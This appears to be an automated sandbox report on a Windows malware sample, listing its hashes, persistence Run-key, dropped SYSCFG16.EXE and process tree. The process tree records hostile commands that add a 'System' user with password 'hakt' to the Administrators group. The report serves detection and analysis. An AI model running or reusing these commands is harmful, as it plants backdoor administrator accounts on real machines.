Analysis
max time kernel: 140s
max time network: 119s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 03/02/2024, 00:18
Static task: static1
Behavioral task: behavioral1
  Sample: 8ae7bb9d6119c991386fa9ed8149c33e.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: 8ae7bb9d6119c991386fa9ed8149c33e.exe
  Resource: win10v2004-20231222-en
General
Target: 8ae7bb9d6119c991386fa9ed8149c33e.exe
Size: 54KB
MD5: 8ae7bb9d6119c991386fa9ed8149c33e
SHA1: 2647ea011d14a51443c4e83c85e64124ab166d31
SHA256: 87d19e3bff436f6d204095917f7a2b1dd58d093d637b8cc0a6aa38b761832241
SHA512: 5239f922e773828896c6bfb98ec0cf1bc9688eadb3e858fa27cb71ed2f691d5e0ada63b8b14ab65139046d887d168f540e8062ff9fdea562cb0db980fc656a21
SSDEEP: 1536:ts+Zgajv3kHK35Y0RKsZ1Ls3JcBHHx/KboFwbQp8X:tFC4kq35Yds/Ls3JcBnAFby8
Malware Config
Signatures
Adds Run key to start application (2 TTPs, 1 IoC)
  description: Set value (str)
  ioc: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows System Configuration = "C:\\Windows\\SYSCFG16.EXE"
  Process: 8ae7bb9d6119c991386fa9ed8149c33e.exe
Drops file in Windows directory (3 IoCs)
  File created: C:\Windows\SYSCFG16.EXE (Process: 8ae7bb9d6119c991386fa9ed8149c33e.exe)
  File opened for modification: C:\Windows\SYSCFG16.EXE (Process: 8ae7bb9d6119c991386fa9ed8149c33e.exe)
  File created: C:\Windows\temp.bat (Process: 8ae7bb9d6119c991386fa9ed8149c33e.exe)
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Runs net.exe
Suspicious use of WriteProcessMemory (20 IoCs; each of the five parent/child pairs below is recorded four times)
  description | pid | Process | procid_target
  PID 2920 wrote to memory of 2724 | 2920 | 8ae7bb9d6119c991386fa9ed8149c33e.exe | 28
  PID 2724 wrote to memory of 2728 | 2724 | cmd.exe | 30
  PID 2728 wrote to memory of 2824 | 2728 | net.exe | 31
  PID 2724 wrote to memory of 2620 | 2724 | cmd.exe | 32
  PID 2620 wrote to memory of 2564 | 2620 | net.exe | 33
Processes
C:\Users\Admin\AppData\Local\Temp\8ae7bb9d6119c991386fa9ed8149c33e.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\8ae7bb9d6119c991386fa9ed8149c33e.exe"
  PID: 2920
  signatures: Adds Run key to start application; Drops file in Windows directory; Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe
    command line: cmd /c ""C:\Windows\temp.bat" "
    PID: 2724
    signatures: Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net.exe
      command line: net user /add System hakt
      PID: 2728
      signatures: Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 user /add System hakt
        PID: 2824
    C:\Windows\SysWOW64\net.exe
      command line: net localgroup /add Administrators System
      PID: 2620
      signatures: Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 localgroup /add Administrators System
        PID: 2564
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 89B
MD5: dccbf9e7aa8e5e8a7d44c634aa4b3e8a
SHA1: a2e14c86d1a890f37afe11e0ef02f3b5f05cf3c3
SHA256: 554c21f981ac2139afa84e5af335c54fce3e0b05db145abef9eb7b2c23612398
SHA512: 8581f237ce5a9df85ebee9f23fe56f6f27d37c6ea66e9c40cd73b6b85487b6e915f83e5a2740eabed7cd2133c6dca46bd062c5429e2223904ffd9aaff09c8e28